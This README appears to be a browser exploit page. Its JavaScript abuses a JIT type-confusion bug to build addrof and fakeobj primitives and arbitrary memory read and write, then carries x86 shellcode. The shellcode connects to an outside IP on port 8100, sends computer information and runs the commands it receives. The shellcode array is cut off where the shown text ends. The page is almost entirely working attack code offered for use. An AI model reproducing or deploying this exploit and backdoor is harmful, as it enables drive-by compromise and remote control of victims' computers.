README.md
Rendering markdown...
<html>
<head>
</head>
<body>
exp
<br>
</body>
<script>
var dv = new DataView(new ArrayBuffer(0x10));
function f2big(f) {
dv.setFloat64(0, f, true);
return (dv.getBigUint64(0, true));
}
function big2f(b) {
dv.setBigUint64(0, b);
return dv.getFloat64(0);
}
function flow(f) {
dv.setFloat64(0, f, true);
return (dv.getUint32(0, true));
}
function fhi(f) {
dv.setFloat64(0, f, true);
return (dv.getUint32(4, true));
}
function i2f(low, hi) {
dv.setUint32(0, low, true);
dv.setUint32(4, hi, true);
return dv.getFloat64(0, true);
}
function print(text) {
alert(text + "<br>");
}
cvt_buf = new ArrayBuffer(8);
cvt_f64a = new Float64Array(cvt_buf);
cvt_u64a = new BigUint64Array(cvt_buf);
cvt_u32a = new Uint32Array(cvt_buf);
function ftoi(f) { // float -> bigint
cvt_f64a[0] = f;
return cvt_u64a[0];
}
function itof(i) { // bigint -> float
cvt_u64a[0] = BigInt(i);
return cvt_f64a[0];
}
function lower(i) {
return Number(i % (2n ** 32n));
}
function upper(i) {
return Number(i / (2n ** 32n));
}
function pair(h, l) {
return BigInt(h) * (2n ** 32n) + BigInt(l);
}
// todo
function leak_array_map(arg_true, obj, flag) {
let o = { ct: true, c0: 0, c1: 1 };
let aa = arg_true ? 8 : "7";
let c0 = (Math.max(aa, 0) + aa - 16);
let v01 = 2 ** 32 + (o.c0 & 1);
let xx = 2 ** 32 - 1;
let ra = (xx >>> c0) - v01;
let rb = ((xx - 2 ** 32) << (32 - c0));
let confused = (ra ^ rb) >> 31; // Range(0,0); is: -1
let arr = new Array(3 + 30 * (1 + confused));
arr[0] = 1e64; // make sure arr is of type double
arr[1] = 2e64;
let arr2 = new Array(10);//[1337.5, 1338.5, 1339.5]; // arr2 is of type double too
for (var i = 0; i < 10; i++) arr2[i] = i + 1337.5;
let iter = arr[Symbol.iterator]();
iter.next(); iter.next(); iter.next();
iter.next();
iter.next(); iter.next(); iter.next(); iter.next(); iter.next(); iter.next(); iter.next(); iter.next(); iter.next();
//v0应该是arr2最åŽä¸€ä¸ªå…ƒç´
let v0 = iter.next();
let v1 = iter.next();
return [v0.value, v1.value, arr2];
}
function leak_addr_helper(arg_true, obj, flag) {
let o = { ct: true, c0: 0, c1: 1 };
let aa = arg_true ? 8 : "7";
let c0 = (Math.max(aa, 0) + aa - 16);
let v01 = 2 ** 32 + (o.c0 & 1);
let xx = 2 ** 32 - 1;
let ra = (xx >>> c0) - v01;
let rb = ((xx - 2 ** 32) << (32 - c0));
let confused = (ra ^ rb) >> 31;
let arr = new Array(3 + 30 * (1 + confused));
arr[0] = 0.5;
let arr2 = new Array(5); for (var idx = 0; idx < 5; idx += 1) arr2[idx] = {};
arr2[1] = obj;
arr2[0] = 0x1337;
let iter = arr[Symbol.iterator]();
iter.next(); iter.next(); iter.next(); iter.next();
let v1 = iter.next().value;
return v1;
}
function fake_obj_helper(arg_true, val, flag) {
let o = { ct: true, c0: 0, c1: 1 };
let aa = arg_true ? 8 : "7";
let c0 = (Math.max(aa, 0) + aa - 16);
let v01 = 2 ** 32 + (o.c0 & 1);
let xx = 2 ** 32 - 1;
let ra = (xx >>> c0) - v01;
let rb = ((xx - 2 ** 32) << (32 - c0));
let confused = (ra ^ rb) >> 31;
let arr = new Array(3 + 30 * (1 + confused));
arr[0] = 0; //smiå’Œobjçš„å †å¸ƒå±€æœ‰ä¸åŒï¼Œè¿™é‡Œä¸è¦åŠ¨
let arr2 = new Array(5); for (var idx = 0; idx < 5; idx += 1) arr2[idx] = 0.0;
arr2[0] = val;
let iter = arr[Symbol.iterator]();
iter.next(); iter.next(); iter.next();
iter.next();
//v0应该是arr2的长度,å³5
let v0 = iter.next();
let v1 = iter.next();
return [v0.value, v1.value];
}
// print("start");
let obj = new Array(128);
for (i = 0; i < 3000; i += 1) leak_addr_helper(true, obj, false);
// alert("jit1");
let arr = new Array(128);
for (i = 0; i < 3000; i += 1) {
leak_array_map(true, arr, false);
}
// print("jit2");
for (i = 0; i < 3000; i += 1) fake_obj_helper(true, 2.567347528655259e-289, false);
fake_obj_helper(true, 1.2132797677859895e-279, true);
// alert("end of jit optimization");
var res = leak_array_map(true, arr, true);
let array_map_leak = res[1];
// print("anchor data = 0x" + (ftoi(res[0])).toString(16) + " | " + res[0]);
// print("array_map_leak = 0x" + (ftoi(res[1])).toString(16) + " | " + res[1]);
function addrof(obj) {
let f = leak_addr_helper(true, obj, true);
return fhi(f);
}
function fakeobj(addr) {
// given a tagged, compressed pointer, return the fake object at that place
let f = itof(pair(addr, addr));
let res = fake_obj_helper(true, f, true);
// print("[*]res[0]:" + res[0])
return res[1];
}
let foo_arr = [1.1, 1.1, 1.1, 1.1, 1.1];
let foo_content_addr = addrof(foo_arr) + 32;
//print("[*] foo_content_addr:" + foo_content_addr.toString(16));
let rw_arr = [itof(pair(0x13361336, 0x13361336)), 1.1, 0.0, array_map_leak, 60.0, 0.0];
let rw_arr_addr = addrof(rw_arr);
//print("[*] rw_arr_addr:" + rw_arr_addr.toString(16));
let rw_arr_content_addr = rw_arr_addr + 0x20;
//print("[*] rw_arr_content_addr:" + rw_arr_content_addr.toString(16));
let r = fakeobj(rw_arr_content_addr + 0x18);
//alert("typeof:" + typeof (r));
function read64(addr) {
rw_arr[4] = itof(pair(50, (addr | 1) - 8));
return ftoi(r[0]);
}
function write64(addr, data) {
rw_arr[4] = itof(pair(50, (addr | 1) - 8));
r[0] = itof(data);
}
// print("before alloc wasm");
var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
var f = wasmInstance.exports.main;
// print("after alloc wasm");
let wasm_instance_addr = addrof(wasmInstance) - 1;
//print("[*] wasm_instance_addr 0x" + wasm_instance_addr.toString(16));
var shellcode = [
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0xC7, 0x45, 0xEC, 0x34, 0x36, 0x2E, 0x38, 0xC7, 0x45, 0xF0,
0x2E, 0x31, 0x37, 0x39, 0xC7, 0x45, 0xF4, 0x2E, 0x32, 0x31, 0x30, 0xC7, 0x45, 0xF8, 0x00, 0x00,
0x00, 0x00, 0xC7, 0x45, 0xFC, 0xA4, 0x1F, 0x00, 0x00, 0xE8, 0x12, 0x00, 0x00, 0x00, 0x8B, 0xE5,
0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x81, 0xEC, 0x70, 0x05, 0x00, 0x00, 0xC7, 0x85, 0x0C, 0xFF, 0xFF, 0xFF, 0x34,
0x36, 0x2E, 0x38, 0xC7, 0x85, 0x10, 0xFF, 0xFF, 0xFF, 0x2E, 0x31, 0x37, 0x39, 0xC7, 0x85, 0x14,
0xFF, 0xFF, 0xFF, 0x2E, 0x32, 0x31, 0x30, 0xC7, 0x85, 0x18, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00,
0x00, 0xC7, 0x85, 0x48, 0xFF, 0xFF, 0xFF, 0xA4, 0x1F, 0x00, 0x00, 0xC6, 0x45, 0xE8, 0x31, 0xC6,
0x45, 0xE9, 0x31, 0xC6, 0x45, 0xEA, 0x30, 0xC6, 0x45, 0xEB, 0x30, 0xC6, 0x45, 0xEC, 0x00, 0xC6,
0x45, 0x80, 0x31, 0xC6, 0x45, 0x81, 0x32, 0xC6, 0x45, 0x82, 0x30, 0xC6, 0x45, 0x83, 0x30, 0xC6,
0x45, 0x84, 0x00, 0xC6, 0x45, 0xE0, 0x31, 0xC6, 0x45, 0xE1, 0x33, 0xC6, 0x45, 0xE2, 0x30, 0xC6,
0x45, 0xE3, 0x30, 0xC6, 0x45, 0xE4, 0x00, 0xC6, 0x45, 0x88, 0x31, 0xC6, 0x45, 0x89, 0x34, 0xC6,
0x45, 0x8A, 0x30, 0xC6, 0x45, 0x8B, 0x30, 0xC6, 0x45, 0x8C, 0x00, 0xC6, 0x45, 0xC8, 0x75, 0xC6,
0x45, 0xC9, 0x73, 0xC6, 0x45, 0xCA, 0x65, 0xC6, 0x45, 0xCB, 0x72, 0xC6, 0x45, 0xCC, 0x33, 0xC6,
0x45, 0xCD, 0x32, 0xC6, 0x45, 0xCE, 0x2E, 0xC6, 0x45, 0xCF, 0x64, 0xC6, 0x45, 0xD0, 0x6C, 0xC6,
0x45, 0xD1, 0x6C, 0xC6, 0x45, 0xD2, 0x00, 0xC6, 0x45, 0xB0, 0x53, 0xC6, 0x45, 0xB1, 0x68, 0xC6,
0x45, 0xB2, 0x65, 0xC6, 0x45, 0xB3, 0x6C, 0xC6, 0x45, 0xB4, 0x6C, 0xC6, 0x45, 0xB5, 0x53, 0xC6,
0x45, 0xB6, 0x74, 0xC6, 0x45, 0xB7, 0x64, 0xC6, 0x45, 0xB8, 0x69, 0xC6, 0x45, 0xB9, 0x6F, 0xC6,
0x45, 0xBA, 0x00, 0xC6, 0x45, 0x94, 0x48, 0xC6, 0x45, 0x95, 0x65, 0xC6, 0x45, 0x96, 0x6C, 0xC6,
0x45, 0x97, 0x6C, 0xC6, 0x45, 0x98, 0x6F, 0xC6, 0x45, 0x99, 0x20, 0xC6, 0x45, 0x9A, 0x57, 0xC6,
0x45, 0x9B, 0x6F, 0xC6, 0x45, 0x9C, 0x72, 0xC6, 0x45, 0x9D, 0x6C, 0xC6, 0x45, 0x9E, 0x64, 0xC6,
0x45, 0x9F, 0x21, 0xC6, 0x45, 0xA0, 0x00, 0xC6, 0x85, 0x74, 0xFF, 0xFF, 0xFF, 0x4F, 0xC6, 0x85,
0x75, 0xFF, 0xFF, 0xFF, 0x6C, 0xC6, 0x85, 0x76, 0xFF, 0xFF, 0xFF, 0x65, 0xC6, 0x85, 0x77, 0xFF,
0xFF, 0xFF, 0x33, 0xC6, 0x85, 0x78, 0xFF, 0xFF, 0xFF, 0x32, 0xC6, 0x85, 0x79, 0xFF, 0xFF, 0xFF,
0x2E, 0xC6, 0x85, 0x7A, 0xFF, 0xFF, 0xFF, 0x64, 0xC6, 0x85, 0x7B, 0xFF, 0xFF, 0xFF, 0x6C, 0xC6,
0x85, 0x7C, 0xFF, 0xFF, 0xFF, 0x6C, 0xC6, 0x85, 0x7D, 0xFF, 0xFF, 0xFF, 0x00, 0xC6, 0x45, 0xBC,
0x57, 0xC6, 0x45, 0xBD, 0x73, 0xC6, 0x45, 0xBE, 0x32, 0xC6, 0x45, 0xBF, 0x5F, 0xC6, 0x45, 0xC0,
0x33, 0xC6, 0x45, 0xC1, 0x32, 0xC6, 0x45, 0xC2, 0x2E, 0xC6, 0x45, 0xC3, 0x64, 0xC6, 0x45, 0xC4,
0x6C, 0xC6, 0x45, 0xC5, 0x6C, 0xC6, 0x45, 0xC6, 0x00, 0x68, 0x4C, 0x77, 0x26, 0x07, 0xE8, 0x7D,
0x07, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xF4, 0xC6, 0x45, 0xD4, 0x4F, 0xC6, 0x45, 0xD5,
0x6C, 0xC6, 0x45, 0xD6, 0x65, 0xC6, 0x45, 0xD7, 0x33, 0xC6, 0x45, 0xD8, 0x32, 0xC6, 0x45, 0xD9,
0x2E, 0xC6, 0x45, 0xDA, 0x64, 0xC6, 0x45, 0xDB, 0x6C, 0xC6, 0x45, 0xDC, 0x6C, 0xC6, 0x45, 0xDD,
0x00, 0xC6, 0x45, 0xA4, 0x57, 0xC6, 0x45, 0xA5, 0x53, 0xC6, 0x45, 0xA6, 0x4F, 0xC6, 0x45, 0xA7,
0x43, 0xC6, 0x45, 0xA8, 0x4B, 0xC6, 0x45, 0xA9, 0x33, 0xC6, 0x45, 0xAA, 0x32, 0xC6, 0x45, 0xAB,
0x2E, 0xC6, 0x45, 0xAC, 0x64, 0xC6, 0x45, 0xAD, 0x6C, 0xC6, 0x45, 0xAE, 0x6C, 0xC6, 0x45, 0xAF,
0x00, 0x8D, 0x45, 0xA4, 0x50, 0xFF, 0x55, 0xF4, 0x89, 0x85, 0xFC, 0xFE, 0xFF, 0xFF, 0x8D, 0x4D,
0xD4, 0x51, 0xFF, 0x55, 0xF4, 0x89, 0x85, 0x04, 0xFF, 0xFF, 0xFF, 0x8D, 0x55, 0xC8, 0x52, 0xFF,
0x55, 0xF4, 0x89, 0x85, 0x08, 0xFF, 0xFF, 0xFF, 0x8D, 0x45, 0xBC, 0x50, 0xFF, 0x55, 0xF4, 0x89,
0x85, 0x00, 0xFF, 0xFF, 0xFF, 0x68, 0x45, 0x83, 0x56, 0x07, 0xE8, 0xE1, 0x06, 0x00, 0x00, 0x83,
0xC4, 0x04, 0x89, 0x85, 0x38, 0xFF, 0xFF, 0xFF, 0x68, 0xC6, 0x96, 0x87, 0x52, 0xE8, 0xCE, 0x06,
0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x85, 0x68, 0xFF, 0xFF, 0xFF, 0x68, 0x79, 0xCC, 0x3F, 0x86,
0xE8, 0xBB, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x85, 0x54, 0xFF, 0xFF, 0xFF, 0x68, 0x44,
0xF0, 0x35, 0xE0, 0xE8, 0xA8, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x85, 0xF8, 0xFE, 0xFF,
0xFF, 0x68, 0x40, 0xE2, 0x61, 0x78, 0xE8, 0x95, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x85,
0x40, 0xFF, 0xFF, 0xFF, 0x68, 0x7C, 0xF4, 0x8E, 0xFE, 0xE8, 0x82, 0x06, 0x00, 0x00, 0x83, 0xC4,
0x04, 0x89, 0x85, 0x44, 0xFF, 0xFF, 0xFF, 0x68, 0x1F, 0x9E, 0x52, 0xEC, 0xE8, 0x6F, 0x06, 0x00,
0x00, 0x83, 0xC4, 0x04, 0x89, 0x85, 0x3C, 0xFF, 0xFF, 0xFF, 0x68, 0xB1, 0x66, 0x28, 0x7F, 0xE8,
0x5C, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x85, 0x64, 0xFF, 0xFF, 0xFF, 0x68, 0x48, 0xE4,
0x16, 0xEA, 0xE8, 0x49, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x45, 0x90, 0x68, 0x88, 0xD1,
0xA6, 0xEA, 0xE8, 0x39, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x85, 0x6C, 0xFF, 0xFF, 0xFF,
0x68, 0xFB, 0x66, 0x2B, 0xEC, 0xE8, 0x26, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x85, 0x34,
0xFF, 0xFF, 0xFF, 0x68, 0x98, 0x16, 0x59, 0xD8, 0xE8, 0x13, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x04,
0x89, 0x85, 0xF4, 0xFE, 0xFF, 0xFF, 0x68, 0x2F, 0x21, 0x12, 0x0B, 0xE8, 0x00, 0x06, 0x00, 0x00,
0x83, 0xC4, 0x04, 0x89, 0x85, 0x4C, 0xFF, 0xFF, 0xFF, 0xC7, 0x45, 0xF8, 0x00, 0x00, 0x00, 0x00,
0xC7, 0x45, 0xF0, 0x00, 0x00, 0x00, 0x00, 0xE8, 0x64, 0x04, 0x00, 0x00, 0x89, 0x85, 0x50, 0xFF,
0xFF, 0xFF, 0x83, 0xBD, 0x50, 0xFF, 0xFF, 0xFF, 0x00, 0x75, 0x07, 0x33, 0xC0, 0xE9, 0xAE, 0x02,
0x00, 0x00, 0x8D, 0x8D, 0x0C, 0xFF, 0xFF, 0xFF, 0x51, 0xFF, 0x95, 0x4C, 0xFF, 0xFF, 0xFF, 0x89,
0x85, 0x70, 0xFF, 0xFF, 0xFF, 0x83, 0xBD, 0x70, 0xFF, 0xFF, 0xFF, 0x00, 0x75, 0x07, 0x33, 0xC0,
0xE9, 0x8B, 0x02, 0x00, 0x00, 0xBA, 0x02, 0x00, 0x00, 0x00, 0x66, 0x89, 0x95, 0xE4, 0xFE, 0xFF,
0xFF, 0xB8, 0x04, 0x00, 0x00, 0x00, 0x6B, 0xC8, 0x00, 0x8B, 0x95, 0x70, 0xFF, 0xFF, 0xFF, 0x8B,
0x42, 0x0C, 0x8B, 0x0C, 0x01, 0x8B, 0x11, 0x89, 0x95, 0xE8, 0xFE, 0xFF, 0xFF, 0x8B, 0x85, 0x48,
0xFF, 0xFF, 0xFF, 0x50, 0xFF, 0x95, 0x44, 0xFF, 0xFF, 0xFF, 0x66, 0x89, 0x85, 0xE6, 0xFE, 0xFF,
0xFF, 0x6A, 0x00, 0x6A, 0x01, 0x6A, 0x02, 0xFF, 0x95, 0x40, 0xFF, 0xFF, 0xFF, 0x89, 0x45, 0xFC,
0x6A, 0x10, 0x8D, 0x8D, 0xE4, 0xFE, 0xFF, 0xFF, 0x51, 0x8B, 0x55, 0xFC, 0x52, 0xFF, 0x95, 0x3C,
0xFF, 0xFF, 0xFF, 0x83, 0xF8, 0xFF, 0x75, 0x1F, 0xFF, 0x95, 0x64, 0xFF, 0xFF, 0xFF, 0x6A, 0x00,
0x8D, 0x45, 0xB0, 0x50, 0x8D, 0x4D, 0x94, 0x51, 0x6A, 0x00, 0xFF, 0x95, 0x38, 0xFF, 0xFF, 0xFF,
0x33, 0xC0, 0xE9, 0x09, 0x02, 0x00, 0x00, 0xC7, 0x85, 0x1C, 0xFF, 0xFF, 0xFF, 0x63, 0x6F, 0x6D,
0x70, 0xC7, 0x85, 0x20, 0xFF, 0xFF, 0xFF, 0x75, 0x74, 0x65, 0x72, 0xC7, 0x85, 0x24, 0xFF, 0xFF,
0xFF, 0x20, 0x69, 0x6E, 0x66, 0xC7, 0x85, 0x28, 0xFF, 0xFF, 0xFF, 0x6F, 0x72, 0x6D, 0x61, 0xC7,
0x85, 0x2C, 0xFF, 0xFF, 0xFF, 0x74, 0x69, 0x6F, 0x6E, 0xC7, 0x85, 0x30, 0xFF, 0xFF, 0xFF, 0x00,
0x00, 0x00, 0x00, 0x6A, 0x00, 0x8D, 0x95, 0x1C, 0xFF, 0xFF, 0xFF, 0x52, 0xE8, 0x1F, 0x09, 0x00,
0x00, 0x83, 0xC4, 0x04, 0x83, 0xC0, 0x01, 0x50, 0x8D, 0x85, 0x1C, 0xFF, 0xFF, 0xFF, 0x50, 0x8B,
0x4D, 0xFC, 0x51, 0xFF, 0x55, 0x90, 0x89, 0x45, 0xF8, 0x83, 0x7D, 0xF8, 0x00, 0x7D, 0x07, 0x33,
0xC0, 0xE9, 0x9A, 0x01, 0x00, 0x00, 0xBA, 0x01, 0x00, 0x00, 0x00, 0x85, 0xD2, 0x0F, 0x84, 0x78,
0x01, 0x00, 0x00, 0x6A, 0x00, 0x6A, 0x0A, 0x8D, 0x85, 0x58, 0xFF, 0xFF, 0xFF, 0x50, 0xE8, 0xAD,
0x03, 0x00, 0x00, 0x83, 0xC4, 0x0C, 0x6A, 0x00, 0x6A, 0x0A, 0x8D, 0x8D, 0x58, 0xFF, 0xFF, 0xFF,
0x51, 0x8B, 0x55, 0xFC, 0x52, 0xFF, 0x95, 0x6C, 0xFF, 0xFF, 0xFF, 0x89, 0x45, 0xF0, 0x83, 0x7D,
0xF0, 0x00, 0x7F, 0x05, 0xE9, 0x42, 0x01, 0x00, 0x00, 0x6A, 0x00, 0x8D, 0x85, 0x58, 0xFF, 0xFF,
0xFF, 0x50, 0xE8, 0xA9, 0x08, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x50, 0x8D, 0x8D, 0x58, 0xFF, 0xFF,
0xFF, 0x51, 0x8B, 0x55, 0xFC, 0x52, 0xFF, 0x55, 0x90, 0x89, 0x45, 0xF8, 0x83, 0x7D, 0xF8, 0x00,
0x7D, 0x05, 0xE9, 0x14, 0x01, 0x00, 0x00, 0x8D, 0x45, 0xE8, 0x50, 0x8D, 0x8D, 0x58, 0xFF, 0xFF,
0xFF, 0x51, 0xE8, 0x29, 0x01, 0x00, 0x00, 0x83, 0xC4, 0x08, 0x85, 0xC0, 0x75, 0x11, 0x8B, 0x55,
0xFC, 0x52, 0xE8, 0xB9, 0x01, 0x00, 0x00, 0x83, 0xC4, 0x04, 0xE9, 0xE7, 0x00, 0x00, 0x00, 0x8D,
0x45, 0xE0, 0x50, 0x8D, 0x8D, 0x58, 0xFF, 0xFF, 0xFF, 0x51, 0xE8, 0x01, 0x01, 0x00, 0x00, 0x83,
0xC4, 0x08, 0x85, 0xC0, 0x0F, 0x85, 0xC7, 0x00, 0x00, 0x00, 0x6A, 0x00, 0x68, 0x00, 0x04, 0x00,
0x00, 0x8D, 0x95, 0x90, 0xFA, 0xFF, 0xFF, 0x52, 0xE8, 0x03, 0x03, 0x00, 0x00, 0x83, 0xC4, 0x0C,
0x6A, 0x00, 0x68, 0x00, 0x04, 0x00, 0x00, 0x8D, 0x85, 0x90, 0xFA, 0xFF, 0xFF, 0x50, 0x8B, 0x4D,
0xFC, 0x51, 0xFF, 0x95, 0x6C, 0xFF, 0xFF, 0xFF, 0x89, 0x45, 0xF0, 0x83, 0x7D, 0xF0, 0x00, 0x7F,
0x05, 0xE9, 0x95, 0x00, 0x00, 0x00, 0x6A, 0x00, 0x8D, 0x95, 0x90, 0xFA, 0xFF, 0xFF, 0x52, 0xE8,
0xFC, 0x07, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x83, 0xC0, 0x01, 0x50, 0x8D, 0x85, 0x90, 0xFA, 0xFF,
0xFF, 0x50, 0x8B, 0x4D, 0xFC, 0x51, 0xFF, 0x55, 0x90, 0x89, 0x45, 0xF8, 0x83, 0x7D, 0xF8, 0x00,
0x7D, 0x02, 0xEB, 0x67, 0x6A, 0x00, 0x6A, 0x44, 0x8D, 0x95, 0x90, 0xFE, 0xFF, 0xFF, 0x52, 0xE8,
0x9C, 0x02, 0x00, 0x00, 0x83, 0xC4, 0x0C, 0x8D, 0x85, 0xD4, 0xFE, 0xFF, 0xFF, 0x50, 0x8D, 0x8D,
0x90, 0xFE, 0xFF, 0xFF, 0x51, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A,
0x00, 0x8D, 0x95, 0x90, 0xFA, 0xFF, 0xFF, 0x52, 0x6A, 0x00, 0xFF, 0x95, 0x54, 0xFF, 0xFF, 0xFF,
0x8B, 0x85, 0xD4, 0xFE, 0xFF, 0xFF, 0x50, 0xFF, 0x95, 0x68, 0xFF, 0xFF, 0xFF, 0x8B, 0x8D, 0xD8,
0xFE, 0xFF, 0xFF, 0x51, 0xFF, 0x95, 0x68, 0xFF, 0xFF, 0xFF, 0xE9, 0x87, 0xFE, 0xFF, 0xFF, 0xEB,
0x05, 0xE9, 0x80, 0xFE, 0xFF, 0xFF, 0xE9, 0x7B, 0xFE, 0xFF, 0xFF, 0x8B, 0x55, 0xFC, 0x52, 0xFF,
0x95, 0x34, 0xFF, 0xFF, 0xFF, 0xFF, 0x95, 0x64, 0xFF, 0xFF, 0xFF, 0xB8, 0x01, 0x00, 0x00, 0x00,
0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0xC7, 0x45, 0xF8, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x45, 0xF4,
0x00, 0x00, 0x00, 0x00, 0x8B, 0x45, 0x08, 0x50, 0xE8, 0x33, 0x07, 0x00, 0x00, 0x83, 0xC4, 0x04,
0x89, 0x45, 0xF0, 0x8B, 0x4D, 0x0C, 0x51, 0xE8, 0x24, 0x07, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89,
0x45, 0xEC, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x09, 0x8B, 0x55, 0xFC, 0x83, 0xC2,
0x01, 0x89, 0x55, 0xFC, 0x8B, 0x45, 0xFC, 0x3B, 0x45, 0xF0, 0x7D, 0x17, 0x8B, 0x4D, 0x08, 0x0F,
0xBE, 0x11, 0x03, 0x55, 0xF8, 0x89, 0x55, 0xF8, 0x8B, 0x45, 0x08, 0x83, 0xC0, 0x01, 0x89, 0x45,
0x08, 0xEB, 0xD8, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x09, 0x8B, 0x4D, 0xFC, 0x83,
0xC1, 0x01, 0x89, 0x4D, 0xFC, 0x8B, 0x55, 0xFC, 0x3B, 0x55, 0xEC, 0x7D, 0x17, 0x8B, 0x45, 0x0C,
0x0F, 0xBE, 0x08, 0x03, 0x4D, 0xF4, 0x89, 0x4D, 0xF4, 0x8B, 0x55, 0x0C, 0x83, 0xC2, 0x01, 0x89,
0x55, 0x0C, 0xEB, 0xD8, 0x8B, 0x45, 0xF8, 0x2B, 0x45, 0xF4, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x81, 0xEC, 0x1C, 0x01, 0x00, 0x00, 0xC7, 0x45, 0xF8, 0x00, 0x00, 0x00, 0x00,
0xC7, 0x45, 0xF4, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00, 0x00, 0x68, 0x48,
0xE4, 0x16, 0xEA, 0xE8, 0x48, 0x02, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xE8, 0x68, 0x88,
0xD1, 0xA6, 0xEA, 0xE8, 0x38, 0x02, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xF0, 0x6A, 0x00,
0x68, 0x00, 0x01, 0x00, 0x00, 0x8D, 0x85, 0xE4, 0xFE, 0xFF, 0xFF, 0x50, 0xE8, 0x2F, 0x01, 0x00,
0x00, 0x83, 0xC4, 0x0C, 0x6A, 0x00, 0x68, 0x00, 0x01, 0x00, 0x00, 0x8D, 0x8D, 0xE4, 0xFE, 0xFF,
0xFF, 0x51, 0x8B, 0x55, 0x08, 0x52, 0xFF, 0x55, 0xF0, 0x89, 0x45, 0xEC, 0x83, 0x7D, 0xEC, 0x00,
0x7D, 0x04, 0x33, 0xC0, 0xEB, 0x6A, 0x6A, 0x00, 0x8D, 0x85, 0xE4, 0xFE, 0xFF, 0xFF, 0x50, 0xE8,
0x2C, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x50, 0x8D, 0x8D, 0xE4, 0xFE, 0xFF, 0xFF, 0x51, 0x8B,
0x55, 0x08, 0x52, 0xFF, 0x55, 0xE8, 0x89, 0x45, 0xE4, 0x83, 0x7D, 0xE4, 0x00, 0x7D, 0x04, 0x33,
0xC0, 0xEB, 0x3D, 0x8D, 0x45, 0xFC, 0x50, 0x8D, 0x4D, 0xF8, 0x51, 0x8B, 0x55, 0x08, 0x52, 0xE8,
0x3C, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x0C, 0x85, 0xC0, 0x74, 0x22, 0x8B, 0x45, 0xFC, 0x50, 0x8B,
0x4D, 0xF8, 0x51, 0x8D, 0x95, 0xE4, 0xFE, 0xFF, 0xFF, 0x52, 0xE8, 0x11, 0x05, 0x00, 0x00, 0x83,
0xC4, 0x0C, 0x85, 0xC0, 0x74, 0x07, 0xC7, 0x45, 0xF4, 0x01, 0x00, 0x00, 0x00, 0x8B, 0x45, 0xF4,
0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x81, 0xEC, 0xA0, 0x01, 0x00, 0x00, 0x68, 0xB1, 0x66, 0x28, 0x7F, 0xE8, 0x6D,
0x01, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xF0, 0x68, 0xAF, 0x78, 0x49, 0x8B, 0xE8, 0x5D,
0x01, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xF8, 0xB8, 0x02, 0x02, 0x00, 0x00, 0x66, 0x89,
0x45, 0xFC, 0x8D, 0x8D, 0x60, 0xFE, 0xFF, 0xFF, 0x51, 0x0F, 0xB7, 0x55, 0xFC, 0x52, 0xFF, 0x55,
0xF8, 0x89, 0x45, 0xF4, 0x83, 0x7D, 0xF4, 0x00, 0x75, 0x33, 0x0F, 0xB7, 0x85, 0x60, 0xFE, 0xFF,
0xFF, 0x25, 0xFF, 0x00, 0x00, 0x00, 0x0F, 0xB6, 0xC8, 0x83, 0xF9, 0x02, 0x75, 0x18, 0x0F, 0xB7,
0x95, 0x62, 0xFE, 0xFF, 0xFF, 0xC1, 0xEA, 0x08, 0x81, 0xE2, 0xFF, 0x00, 0x00, 0x00, 0x0F, 0xB6,
0xC2, 0x83, 0xF8, 0x02, 0x75, 0x07, 0xB8, 0x01, 0x00, 0x00, 0x00, 0xEB, 0x05, 0xFF, 0x55, 0xF0,
